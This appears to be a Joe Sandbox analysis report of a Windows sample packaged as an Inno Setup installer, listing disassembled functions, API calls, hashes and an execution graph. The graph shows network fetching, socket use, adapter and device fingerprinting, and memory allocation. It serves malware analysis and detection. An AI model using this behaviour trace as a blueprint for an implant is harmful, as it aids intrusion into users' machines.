                                                                  • Instruction ID: 6201355901f458c0f36557428e85d419ca31de49550c26c5d668688d9bb1e683
                                                                  • Opcode Fuzzy Hash: 34c6542742eff2dadab3d088a7a61d5c053afa182c64a6caa50429fa903ca566
                                                                  • Instruction Fuzzy Hash: 660161B1644648AFEF05DBA2DC42FAEBBACDF48714F61003BF504E7291D6785E05CA68
                                                                  Function 0042DD5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD70
                                                                  • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Value$EnumQuery
                                                                  • String ID: Inno Setup: No Icons
                                                                  • API String ID: 1576479698-2016326496
                                                                  • Opcode ID: 388e812ecd06e97e1b31d188035ef8f8b81e1277dc232162d6a0b94f1a497a96
                                                                  • Instruction ID: 0d60c2ceabc561baab214a4f8badfae1c51fae2703c03b7062d0178a0b9483fa
                                                                  • Opcode Fuzzy Hash: 388e812ecd06e97e1b31d188035ef8f8b81e1277dc232162d6a0b94f1a497a96
                                                                  • Instruction Fuzzy Hash: C3012632B55B307AFB3085256C42F7B568CCF46B60F68003BF981EA2C1D6989C04936E
                                                                  Function 00497510 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0047C8B0: FreeLibrary.KERNEL32(6FBF0000,00480FF3), ref: 0047C8C6
                                                                    • Part of subcall function 0047C580: GetTickCount.KERNEL32 ref: 0047C5CA
                                                                    • Part of subcall function 004570B4: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004570D3
                                                                  • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,00497E67), ref: 00497565
                                                                  • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,00497E67), ref: 0049756B
                                                                  Strings
                                                                  • Detected restart. Removing temporary directory., xrefs: 0049751F
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                  • String ID: Detected restart. Removing temporary directory.
                                                                  • API String ID: 1717587489-3199836293
                                                                  • Opcode ID: 10733e8d0c2fcbcf81e8bc1e4ca83bd3e168a9b9b9b758ab357db50908ba3c86
                                                                  • Instruction ID: 3a6ec644de21484b963019a16799c2105d01f9358526232ca3662f3e81dafe78
                                                                  • Opcode Fuzzy Hash: 10733e8d0c2fcbcf81e8bc1e4ca83bd3e168a9b9b9b758ab357db50908ba3c86
                                                                  • Instruction Fuzzy Hash: C5E0E57121C6007EDE4177B6BC6295B3F9CD745778752483BF40881952E52D5810C6BD
                                                                  Function 00403344 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(00000000,004980C2), ref: 0040334B
                                                                  • GetCommandLineA.KERNEL32(00000000,004980C2), ref: 00403356
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CommandHandleLineModule
                                                                  • String ID: h6W
                                                                  • API String ID: 2123368496-3314947752
                                                                  • Opcode ID: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                                  • Instruction ID: ff8fa06d391bd0b31f892a344b3e95d40f530220570fde7b1ba7fad45aeb04f1
                                                                  • Opcode Fuzzy Hash: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                                  • Instruction Fuzzy Hash: 45C002609013058AD754AF7579467162A94D751349F80447FF114BA3E1D77C82055BDD
                                                                  Function 00455648 Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastSleep
                                                                  • String ID:
                                                                  • API String ID: 1458359878-0
                                                                  • Opcode ID: defff66af4325d3c28b570447d2f47c0b7c8b64933ddb782de5565f815c6b007
                                                                  • Instruction ID: de14e8d07cc4d1fec6b94f0f99926b65e7014e25a7505cf550c56fab82152177
                                                                  • Opcode Fuzzy Hash: defff66af4325d3c28b570447d2f47c0b7c8b64933ddb782de5565f815c6b007
                                                                  • Instruction Fuzzy Hash: 91F0F672640954978A20B5DB89A1A3F724CDA94365760012BEC0CD7203C579CC494BAD

                                                                  Execution Graph

                                                                  Execution Coverage:2.7%
                                                                  Dynamic/Decrypted Code Coverage:83.4%
                                                                  Signature Coverage:13.9%
                                                                  Total number of Nodes:1034
                                                                  Total number of Limit Nodes:35
                                                                  execution_graph 60721 40d8e0 LoadLibraryExA 60723 402602 60721->60723 60722 40df22 60723->60722 60724 40de05 GetLastError 60723->60724 60726 40d22e Sleep 60723->60726 60728 2e53d0f 60723->60728 60726->60723 60729 2e53d1d 60728->60729 60730 2e53d18 60728->60730 60734 2e53d32 60729->60734 60742 2e5b8e1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 60730->60742 60733 2e53d2b 60733->60723 60735 2e53d3e __fcloseall 60734->60735 60739 2e53d8c ___DllMainCRTStartup 60735->60739 60741 2e53de9 __fcloseall 60735->60741 60743 2e53b9d 60735->60743 60737 2e53dc6 60738 2e53b9d __CRT_INIT@12 138 API calls 60737->60738 60737->60741 60738->60741 60739->60737 60740 2e53b9d __CRT_INIT@12 138 API calls 60739->60740 60739->60741 60740->60737 60741->60733 60742->60729 60744 2e53ba9 __fcloseall 60743->60744 60745 2e53bb1 60744->60745 60746 2e53c2b 60744->60746 60791 2e581e7 GetProcessHeap 60745->60791 60748 2e53c94 60746->60748 60749 2e53c2f 60746->60749 60751 2e53cf7 60748->60751 60752 2e53c99 60748->60752 60754 2e53c50 60749->60754 60762 2e53bba __fcloseall __CRT_INIT@12 60749->60762 60880 2e5845c 59 API calls _doexit 60749->60880 60750 2e53bb6 60750->60762 60792 2e55d94 60750->60792 60751->60762 60911 2e55c24 59 API calls 2 library calls 60751->60911 60885 2e591cb 60752->60885 60881 2e58333 61 API calls _free 60754->60881 60757 2e53ca4 60757->60762 60888 2e58a6d 60757->60888 60760 2e53bc6 __RTC_Initialize 60760->60762 60768 2e53bd6 GetCommandLineA 60760->60768 60761 2e53c55 60773 2e53c66 __CRT_INIT@12 60761->60773 60882 2e5b57f 60 API calls _free 60761->60882 60762->60739 60767 2e53c61 60883 2e55e0a 62 API calls 2 library calls 60767->60883 60813 2e5b97d GetEnvironmentStringsW 60768->60813 60772 2e53ccd 60775 2e53cd3 60772->60775 60776 2e53ceb 60772->60776 60884 2e53c7f 62 API calls __mtterm 60773->60884 60895 2e55ce1 60775->60895 60905 2e52f74 60776->60905 60780 2e53bf0 60782 2e53bf4 60780->60782 60845 2e5b5d1 60780->60845 60781 2e53cdb GetCurrentThreadId 60781->60762 60878 2e55e0a 62 API calls 2 library calls 60782->60878 60786 2e53c14 60786->60762 60879 2e5b57f 60 API calls _free 60786->60879 60791->60750 60912 2e58503 36 API calls 2 library calls 60792->60912 60794 2e55d99 60913 2e58a1f InitializeCriticalSectionAndSpinCount __getstream 60794->60913 60796 2e55d9e 60797 2e55da2 60796->60797 60915 2e5918e TlsAlloc 60796->60915 60914 2e55e0a 62 API calls 2 library calls 60797->60914 60800 2e55da7 60800->60760 60801 2e55db4 60801->60797 60802 2e55dbf 60801->60802 60803 2e58a6d __calloc_crt 59 API calls 60802->60803 60804 2e55dcc 60803->60804 60805 2e55e01 60804->60805 60916 2e591ea TlsSetValue 60804->60916 60917 2e55e0a 62 API calls 2 library calls 60805->60917 60808 2e55de0 60808->60805 60810 2e55de6 60808->60810 60809 2e55e06 60809->60760 60811 2e55ce1 __initptd 59 API calls 60810->60811 60812 2e55dee GetCurrentThreadId 60811->60812 60812->60760 60814 2e53be6 60813->60814 60815 2e5b990 WideCharToMultiByte 60813->60815 60826 2e5b2cb 60814->60826 60817 2e5b9c3 60815->60817 60818 2e5b9fa FreeEnvironmentStringsW 60815->60818 60918 2e58ab5 59 API calls 2 library calls 60817->60918 60818->60814 60820 2e5b9c9 60820->60818 60821 2e5b9d0 WideCharToMultiByte 60820->60821 60822 2e5b9e6 60821->60822 60823 2e5b9ef FreeEnvironmentStringsW 60821->60823 60824 2e52f74 _free 59 API calls 60822->60824 60823->60814 60825 2e5b9ec 60824->60825 60825->60823 60827 2e5b2d7 __fcloseall 60826->60827 60919 2e588ee 60827->60919 60829 2e5b2de 60830 2e58a6d __calloc_crt 59 API calls 60829->60830 60831 2e5b2ef 60830->60831 60832 2e5b35a GetStartupInfoW 60831->60832 60833 2e5b2fa __fcloseall @_EH4_CallFilterFunc@8 60831->60833 60839 2e5b36f 60832->60839 60842 2e5b49e 60832->60842 60833->60780 60834 2e5b566 60928 2e5b576 RtlLeaveCriticalSection _doexit 60834->60928 60836 2e58a6d __calloc_crt 59 API calls 60836->60839 60837 2e5b4eb GetStdHandle 60837->60842 60838 2e5b4fe GetFileType 60838->60842 60839->60836 60841 2e5b3bd 60839->60841 60839->60842 60840 2e5b3f1 GetFileType 60840->60841 60841->60840 60841->60842 60926 2e5920c InitializeCriticalSectionAndSpinCount 60841->60926 60842->60834 60842->60837 60842->60838 60927 2e5920c InitializeCriticalSectionAndSpinCount 60842->60927 60846 2e5b5e4 GetModuleFileNameA 60845->60846 60847 2e5b5df 60845->60847 60848 2e5b611 60846->60848 60937 2e5528a 71 API calls __setmbcp 60847->60937 60931 2e5b684 60848->60931 60851 2e53c00 60851->60786 60856 2e5b800 60851->60856 60854 2e5b64a 60854->60851 60855 2e5b684 _parse_cmdline 59 API calls 60854->60855 60855->60851 60857 2e5b809 60856->60857 60860 2e5b80e _strlen 60856->60860 60941 2e5528a 71 API calls __setmbcp 60857->60941 60859 2e53c09 60859->60786 60872 2e5846b 60859->60872 60860->60859 60861 2e58a6d __calloc_crt 59 API calls 60860->60861 60866 2e5b844 _strlen 60861->60866 60862 2e52f74 _free 59 API calls 60862->60859 60863 2e5b896 60863->60862 60864 2e58a6d __calloc_crt 59 API calls 60864->60866 60865 2e5b8bd 60868 2e52f74 _free 59 API calls 60865->60868 60866->60859 60866->60863 60866->60864 60866->60865 60869 2e5b8d4 60866->60869 60942 2e56cbc 59 API calls 2 library calls 60866->60942 60868->60859 60943 2e54f05 8 API calls 2 library calls 60869->60943 60871 2e5b8e0 60874 2e58477 __IsNonwritableInCurrentImage 60872->60874 60944 2e5d2df 60874->60944 60875 2e58495 __initterm_e 60877 2e584b4 __cinit __IsNonwritableInCurrentImage 60875->60877 60947 2e533a4 60875->60947 60877->60786 60878->60762 60879->60782 60880->60754 60881->60761 60882->60767 60883->60773 60884->60762 60886 2e591e2 TlsGetValue 60885->60886 60887 2e591de 60885->60887 60886->60757 60887->60757 60889 2e58a74 60888->60889 60891 2e53cb5 60889->60891 60893 2e58a92 60889->60893 60982 2e604b8 60889->60982 60891->60762 60894 2e591ea TlsSetValue 60891->60894 60893->60889 60893->60891 60990 2e59505 Sleep 60893->60990 60894->60772 60896 2e55ced __fcloseall 60895->60896 60897 2e588ee __lock 59 API calls 60896->60897 60898 2e55d2a 60897->60898 60993 2e55d82 60898->60993 60901 2e588ee __lock 59 API calls 60902 2e55d4b ___addlocaleref 60901->60902 60996 2e55d8b 60902->60996 60904 2e55d76 __fcloseall 60904->60781 60906 2e52f7d HeapFree 60905->60906 60910 2e52fa6 _free 60905->60910 60907 2e52f92 60906->60907 60906->60910 61001 2e55e5b 59 API calls __getptd_noexit 60907->61001 60909 2e52f98 GetLastError 60909->60910 60910->60762 60911->60762 60912->60794 60913->60796 60914->60800 60915->60801 60916->60808 60917->60809 60918->60820 60920 2e58912 RtlEnterCriticalSection 60919->60920 60921 2e588ff 60919->60921 60920->60829 60929 2e58976 59 API calls 10 library calls 60921->60929 60923 2e58905 60923->60920 60930 2e58440 59 API calls 3 library calls 60923->60930 60926->60841 60927->60842 60928->60833 60929->60923 60933 2e5b6a6 60931->60933 60935 2e5b70a 60933->60935 60939 2e615d6 59 API calls x_ismbbtype_l 60933->60939 60934 2e5b627 60934->60851 60938 2e58ab5 59 API calls 2 library calls 60934->60938 60935->60934 60940 2e615d6 59 API calls x_ismbbtype_l 60935->60940 60937->60846 60938->60854 60939->60933 60940->60935 60941->60860 60942->60866 60943->60871 60945 2e5d2e2 RtlEncodePointer 60944->60945 60945->60945 60946 2e5d2fc 60945->60946 60946->60875 60950 2e532a8 60947->60950 60949 2e533af 60949->60877 60951 2e532b4 __fcloseall 60950->60951 60958 2e58593 60951->60958 60957 2e532db __fcloseall 60957->60949 60959 2e588ee __lock 59 API calls 60958->60959 60960 2e532bd 60959->60960 60961 2e532ec RtlDecodePointer RtlDecodePointer 60960->60961 60962 2e53319 60961->60962 60963 2e532c9 60961->60963 60962->60963 60975 2e5915d 60 API calls 2 library calls 60962->60975 60972 2e532e6 60963->60972 60965 2e5337c RtlEncodePointer RtlEncodePointer 60965->60963 60966 2e53350 60966->60963 60970 2e5336a RtlEncodePointer 60966->60970 60977 2e58afc 62 API calls 2 library calls 60966->60977 60967 2e5332b 60967->60965 60967->60966 60976 2e58afc 62 API calls 2 library calls 60967->60976 60970->60965 60971 2e53364 60971->60963 60971->60970 60978 2e5859c 60972->60978 60975->60967 60976->60966 60977->60971 60981 2e58a58 RtlLeaveCriticalSection 60978->60981 60980 2e532eb 60980->60957 60981->60980 60983 2e604c3 60982->60983 60988 2e604de 60982->60988 60984 2e604cf 60983->60984 60983->60988 60991 2e55e5b 59 API calls __getptd_noexit 60984->60991 60986 2e604ee RtlAllocateHeap 60987 2e604d4 60986->60987 60986->60988 60987->60889 60988->60986 60988->60987 60992 2e58204 RtlDecodePointer 60988->60992 60990->60893 60991->60987 60992->60988 60999 2e58a58 RtlLeaveCriticalSection 60993->60999 60995 2e55d44 60995->60901 61000 2e58a58 RtlLeaveCriticalSection 60996->61000 60998 2e55d92 60998->60904 60999->60995 61000->60998 61001->60909 61002 40dc42 61003 40dc46 61002->61003 61004 40dcaf 61002->61004 61003->61004 61005 40dc5d RegOpenKeyExA 61003->61005 61006 40dc70 61005->61006 61007 40d402 VirtualAlloc 61008 40d6a1 61007->61008 61009 2e4f9a6 LoadLibraryA 61010 2e4f9cf GetProcAddress 61009->61010 61011 2e4fa89 61009->61011 61012 2e4fa82 FreeLibrary 61010->61012 61015 2e4f9e3 61010->61015 61012->61011 61013 2e4f9f5 GetAdaptersInfo 61013->61015 61014 2e4fa7d 61014->61012 61015->61013 61015->61014 61017 2e53b4c 61015->61017 61019 2e53b54 61017->61019 61020 2e53b6e 61019->61020 61022 2e53b72 std::exception::exception 61019->61022 61025 2e52fac 61019->61025 61042 2e58204 RtlDecodePointer 61019->61042 61020->61015 61043 2e5455a RaiseException 61022->61043 61024 2e53b9c 61026 2e53027 61025->61026 61035 2e52fb8 61025->61035 61050 2e58204 RtlDecodePointer 61026->61050 61028 2e5302d 61051 2e55e5b 59 API calls __getptd_noexit 61028->61051 61031 2e52feb RtlAllocateHeap 61032 2e5301f 61031->61032 61031->61035 61032->61019 61034 2e52fc3 61034->61035 61044 2e586d4 59 API calls 2 library calls 61034->61044 61045 2e58731 59 API calls 8 library calls 61034->61045 61046 2e5831d GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 61034->61046 61035->61031 61035->61034 61036 2e53013 61035->61036 61040 2e53011 61035->61040 61047 2e58204 RtlDecodePointer 61035->61047 61048 2e55e5b 59 API calls __getptd_noexit 61036->61048 61049 2e55e5b 59 API calls __getptd_noexit 61040->61049 61042->61019 61043->61024 61044->61034 61045->61034 61047->61035 61048->61040 61049->61032 61050->61028 61051->61032 61052 40dbc2 lstrcmpiW 61053 2e7e084 61054 2e7e0a9 61053->61054 61057 2e4f8a2 CreateFileA 61054->61057 61058 2e4f99e 61057->61058 61062 2e4f8d3 61057->61062 61059 2e4f8eb DeviceIoControl 61059->61062 61060 2e4f994 CloseHandle 61060->61058 61061 2e4f960 GetLastError 61061->61060 61061->61062 61062->61059 61062->61060 61062->61061 61063 2e53b4c _Allocate 60 API calls 61062->61063 61063->61062 61064 2e7e224 CreateFileA 61065 2e9af16 61064->61065 61066 402247 CopyFileA 61067 402840 61066->61067 61068 402947 61069 40295b RegCloseKey 61068->61069 61071 40d6d7 61069->61071 61071->61071 61072 2e4104d 61073 2e533a4 __cinit 68 API calls 61072->61073 61074 2e41057 61073->61074 61077 2e41aa9 InterlockedIncrement 61074->61077 61078 2e41ac5 WSAStartup InterlockedExchange 61077->61078 61079 2e4105c 61077->61079 61078->61079 61080 402cce 61083 402cd1 61080->61083 61081 40d168 RegCloseKey 61081->61083 61082 40dca1 61082->61082 61083->61081 61083->61082 61084 2e472ab InternetOpenA 61085 2e472c9 InternetSetOptionA InternetSetOptionA InternetSetOptionA 61084->61085 61093 2e47389 __cftoa_l 61084->61093 61188 2e54af0 61085->61188 61088 2e47382 InternetCloseHandle 61088->61093 61089 2e47342 InternetReadFile 61095 2e47377 InternetCloseHandle 61089->61095 61090 2e46708 Sleep 61092 2e4670e RtlEnterCriticalSection RtlLeaveCriticalSection 61090->61092 61091 2e466f4 61091->61090 61091->61092 61101 2e46744 __cftoa_l 61092->61101 61093->61091 61096 2e473e9 RtlEnterCriticalSection RtlLeaveCriticalSection 61093->61096 61095->61088 61190 2e5233c 61096->61190 61098 2e47413 61099 2e47463 61098->61099 61102 2e5233c 66 API calls 61098->61102 61099->61091 61100 2e5233c 66 API calls 61099->61100 61103 2e47484 61100->61103 61104 2e47427 61102->61104 61109 2e52fac _malloc 59 API calls 61103->61109 61159 2e47738 61103->61159 61104->61099 61105 2e5233c 66 API calls 61104->61105 61107 2e4743b 61105->61107 61106 2e5233c 66 API calls 61108 2e47750 61106->61108 61107->61099 61113 2e5233c 66 API calls 61107->61113 61110 2e4779d 61108->61110 61112 2e4775a __cftoa_l 61108->61112 61111 2e4749d RtlEnterCriticalSection RtlLeaveCriticalSection 61109->61111 61114 2e5233c 66 API calls 61110->61114 61139 2e474d5 __cftoa_l 61111->61139 61117 2e4776a RtlEnterCriticalSection RtlLeaveCriticalSection 61112->61117 61115 2e4744f 61113->61115 61116 2e477ab 61114->61116 61115->61099 61120 2e5233c 66 API calls 61115->61120 61118 2e477d0 61116->61118 61119 2e477b1 61116->61119 61117->61091 61122 2e5233c 66 API calls 61118->61122 61243 2e461f5 61119->61243 61120->61099 61123 2e477de 61122->61123 61124 2e47b00 61123->61124 61127 2e477f0 61123->61127 61125 2e5233c 66 API calls 61124->61125 61126 2e47b0e 61125->61126 61126->61091 61128 2e52fac _malloc 59 API calls 61126->61128 61127->61091 61246 2e52418 61127->61246 61132 2e47b22 __cftoa_l 61128->61132 61136 2e47b4f 61132->61136 61316 2e4534d 93 API calls 2 library calls 61132->61316 61133 2e478aa 61134 2e478e2 RtlEnterCriticalSection 61133->61134 61137 2e47905 61134->61137 61138 2e4790f RtlLeaveCriticalSection 61134->61138 61135 2e4755c 61142 2e52fac _malloc 59 API calls 61135->61142 61143 2e52f74 _free 59 API calls 61136->61143 61137->61138 61264 2e43c67 61138->61264 61139->61135 61140 2e5233c 66 API calls 61139->61140 61140->61135 61150 2e47593 __cftoa_l 61142->61150 61143->61091 61152 2e475f8 61150->61152 61309 2e535e6 60 API calls 3 library calls 61150->61309 61151 2e47ae7 61315 2e49002 88 API calls __EH_prolog 61151->61315 61155 2e52f74 _free 59 API calls 61152->61155 61157 2e475fe 61155->61157 61157->61159 61161 2e53b4c _Allocate 60 API calls 61157->61161 61158 2e47aaf 61294 2e483e9 61158->61294 61159->61106 61165 2e4760e 61161->61165 61169 2e47629 61165->61169 61312 2e49736 212 API calls __EH_prolog 61165->61312 61166 2e475c4 61166->61152 61310 2e52850 59 API calls _vscan_fn 61166->61310 61311 2e535e6 60 API calls 3 library calls 61166->61311 61168 2e4a724 73 API calls 61174 2e47a1a 61168->61174 61200 2e4a84e 61169->61200 61173 2e4763f 61204 2e45119 61173->61204 61174->61158 61175 2e4a724 73 API calls 61174->61175 61176 2e47a6b 61175->61176 61176->61158 61289 2e4d116 61176->61289 61179 2e47687 61233 2e4ac0e 61179->61233 61182 2e476e7 shared_ptr 61183 2e476ec Sleep 61182->61183 61313 2e518f0 GetProcessHeap HeapFree 61183->61313 61185 2e47708 61186 2e47722 shared_ptr 61185->61186 61314 2e44100 GetProcessHeap HeapFree 61185->61314 61186->61159 61189 2e47322 InternetOpenUrlA 61188->61189 61189->61088 61189->61089 61191 2e5236b 61190->61191 61192 2e52348 61190->61192 61319 2e52383 66 API calls 5 library calls 61191->61319 61192->61191 61194 2e5234e 61192->61194 61317 2e55e5b 59 API calls __getptd_noexit 61194->61317 61195 2e5237e 61195->61098 61197 2e52353 61318 2e54ef5 9 API calls __fclose_nolock 61197->61318 61199 2e5235e 61199->61098 61201 2e4a858 __EH_prolog 61200->61201 61320 2e4dfff 61201->61320 61203 2e4a876 shared_ptr 61203->61173 61205 2e45123 __EH_prolog 61204->61205 61324 2e50b10 61205->61324 61208 2e43c67 72 API calls 61209 2e4514a 61208->61209 61210 2e43d7e 64 API calls 61209->61210 61211 2e45158 61210->61211 61212 2e4833a 89 API calls 61211->61212 61213 2e4516c 61212->61213 61214 2e45322 shared_ptr 61213->61214 61215 2e4a724 73 API calls 61213->61215 61214->61179 61216 2e4519d 61215->61216 61216->61214 61217 2e451c4 61216->61217 61218 2e451f6 61216->61218 61219 2e4a724 73 API calls 61217->61219 61220 2e4a724 73 API calls 61218->61220 61221 2e451d4 61219->61221 61222 2e45207 61220->61222 61221->61214 61224 2e4a724 73 API calls 61221->61224 61222->61214 61223 2e4a724 73 API calls 61222->61223 61225 2e4524a 61223->61225 61226 2e452b4 61224->61226 61225->61214 61227 2e4a724 73 API calls 61225->61227 61226->61214 61228 2e4a724 73 API calls 61226->61228 61227->61221 61229 2e452da 61228->61229 61229->61214 61230 2e4a724 73 API calls 61229->61230 61231 2e45304 61230->61231 61328 2e4ced8 61231->61328 61234 2e4ac18 __EH_prolog 61233->61234 61352 2e4d0ed 72 API calls 61234->61352 61236 2e4ac39 shared_ptr 61353 2e520f0 61236->61353 61238 2e4ac50 61239 2e476d4 61238->61239 61359 2e43fb0 68 API calls Mailbox 61238->61359 61239->61182 61239->61183 61241 2e4ac5c 61360 2e4a68a 60 API calls 4 library calls 61241->61360 61244 2e52fac _malloc 59 API calls 61243->61244 61245 2e46208 61244->61245 61247 2e52434 61246->61247 61248 2e52449 61246->61248 61595 2e55e5b 59 API calls __getptd_noexit 61247->61595 61248->61247 61252 2e52450 61248->61252 61250 2e52439 61596 2e54ef5 9 API calls __fclose_nolock 61250->61596 61253 2e47827 61252->61253 61597 2e55f01 79 API calls 6 library calls 61252->61597 61255 2e41ba7 61253->61255 61598 2e653f0 61255->61598 61257 2e41bb1 RtlEnterCriticalSection 61258 2e41be9 RtlLeaveCriticalSection 61257->61258 61259 2e41bd1 61257->61259 61599 2e4e32f 61258->61599 61259->61258 61261 2e41c55 RtlLeaveCriticalSection 61259->61261 61261->61133 61262 2e41c22 61262->61261 61265 2e50b10 Mailbox 68 API calls 61264->61265 61266 2e43c7e 61265->61266 61662 2e43ca2 61266->61662 61271 2e43d7e 61272 2e43d99 htons 61271->61272 61273 2e43dcb htons 61271->61273 61691 2e43bd3 60 API calls 2 library calls 61272->61691 61692 2e43c16 60 API calls 2 library calls 61273->61692 61276 2e43db7 htonl htonl 61277 2e43ded 61276->61277 61278 2e4833a 61277->61278 61279 2e48352 61278->61279 61280 2e48373 61278->61280 61693 2e495fc 61279->61693 61283 2e4796c 61280->61283 61696 2e42ac7 61280->61696 61283->61151 61284 2e4a724 61283->61284 61285 2e50b10 Mailbox 68 API calls 61284->61285 61286 2e4a73e 61285->61286 61287 2e479b8 61286->61287 61767 2e42db5 61286->61767 61287->61158 61287->61168 61290 2e50b10 Mailbox 68 API calls 61289->61290 61293 2e4d12c 61290->61293 61291 2e4d21a 61291->61158 61292 2e42db5 73 API calls 61292->61293 61293->61291 61293->61292 61295 2e48404 WSASetLastError shutdown 61294->61295 61296 2e483f4 61294->61296 61298 2e4a508 69 API calls 61295->61298 61297 2e50b10 Mailbox 68 API calls 61296->61297 61299 2e47ac7 61297->61299 61300 2e48421 61298->61300 61302 2e433b2 61299->61302 61300->61299 61301 2e50b10 Mailbox 68 API calls 61300->61301 61301->61299 61303 2e433c4 InterlockedCompareExchange 61302->61303 61304 2e433e1 61302->61304 61303->61304 61305 2e433d6 61303->61305 61306 2e429ee 76 API calls 61304->61306 61791 2e432ab 78 API calls 2 library calls 61305->61791 61308 2e433f1 61306->61308 61308->61151 61309->61166 61310->61166 61311->61166 61312->61169 61313->61185 61314->61186 61315->61091 61316->61136 61317->61197 61318->61199 61319->61195 61321 2e4e009 __EH_prolog 61320->61321 61322 2e53b4c _Allocate 60 API calls 61321->61322 61323 2e4e020 61322->61323 61323->61203 61325 2e4513d 61324->61325 61326 2e50b39 61324->61326 61325->61208 61327 2e533a4 __cinit 68 API calls 61326->61327 61327->61325 61329 2e50b10 Mailbox 68 API calls 61328->61329 61330 2e4cef2 61329->61330 61331 2e4d001 61330->61331 61333 2e42b95 61330->61333 61331->61214 61334 2e42bc7 61333->61334 61335 2e42bb1 61333->61335 61337 2e42bdf 61334->61337 61338 2e42bd2 61334->61338 61336 2e50b10 Mailbox 68 API calls 61335->61336 61342 2e42bb6 61336->61342 61339 2e42be2 WSASetLastError WSARecv 61337->61339 61337->61342 61343 2e42d22 61337->61343 61345 2e42cbc WSASetLastError select 61337->61345 61346 2e50b10 68 API calls Mailbox 61337->61346 61340 2e50b10 Mailbox 68 API calls 61338->61340 61348 2e4a508 61339->61348 61340->61342 61342->61330 61351 2e41996 68 API calls __cinit 61343->61351 61347 2e4a508 69 API calls 61345->61347 61346->61337 61347->61337 61349 2e50b10 Mailbox 68 API calls 61348->61349 61350 2e4a514 WSAGetLastError 61349->61350 61350->61337 61351->61342 61352->61236 61361 2e533b9 61353->61361 61355 2e52114 61355->61238 61357 2e5213d ResumeThread 61357->61238 61358 2e52136 CloseHandle 61358->61357 61359->61241 61362 2e533c7 61361->61362 61363 2e533db 61361->61363 61385 2e55e5b 59 API calls __getptd_noexit 61362->61385 61365 2e58a6d 